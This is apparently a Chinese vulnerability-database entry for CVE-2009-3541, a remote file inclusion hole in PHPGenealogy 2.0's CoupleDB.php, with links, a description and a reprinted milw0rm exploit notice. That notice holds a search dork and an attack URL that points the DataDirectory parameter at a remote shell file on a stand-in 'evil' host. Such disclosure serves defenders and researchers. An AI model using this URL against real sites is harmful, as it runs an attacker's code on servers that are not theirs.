phpgenealogy CoupleDB.php 代码注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1118116 漏洞类型 代码注入
发布时间 2009-07-15 更新时间 2009-07-15
CVE编号 CVE-2009-3541 CNNVD-ID CNNVD-200910-129
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/9155
https://www.securityfocus.com/bid/43566
https://cxsecurity.com/issue/WLB-2009100092
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200910-129
|漏洞详情
PHPGenealogy2.0版本的CoupleDB.php中存在PHP远程文件包含漏洞。远程攻击者可以借助数据目录参数中的一个URL,执行任意的PHP代码。
|漏洞EXP
#####################################################################################
####                           PHPGenealogy v2.0 Rfi                             ####
#####################################################################################
#                                                                                   #
#AUTHOR : Sina Yazdanmehr (R3d.W0rm)                                                #
#Discovered by : Sina Yazdanmehr (R3d.W0rm)                                         #
#Our Site : http://ircrash.com                                                      #
#My Official WebSite : http://r3dw0rm.ir                                            #
#IRCRASH Team Members : Khashayar Fereidani - R3d.w0rm (Sina Yazdanmehr)            #
#####################################################################################
#                                                                                   #
#Download : http://sourceforge.net/project/showfiles.php?group_id=98241             #
#                                                                                   #
#Dork : PHPGénéalogie fonctionne sur un serveur PHP                                 #
#                                                                                   #
#####################################################################################
#                                      [Bug]                                        #
#                                                                                   #
#http://[site]/[path]/CoupleDB.php?Parametre=0&DataDirectory=http://evil/shell.txt? #
#                                                                                   #
###################################### TNX GOD ######################################

# milw0rm.com [2009-07-15]
|受影响的产品
Emmanuel SPERI PHPGenealogy 2.0
|参考资料

来源:XF
名称:phpgenealogy-datadirectory-file-include(51728)
链接:http://xforce.iss.net/xforce/xfdb/51728
来源:MILW0RM
名称:9155
链接:http://www.milw0rm.com/exploits/9155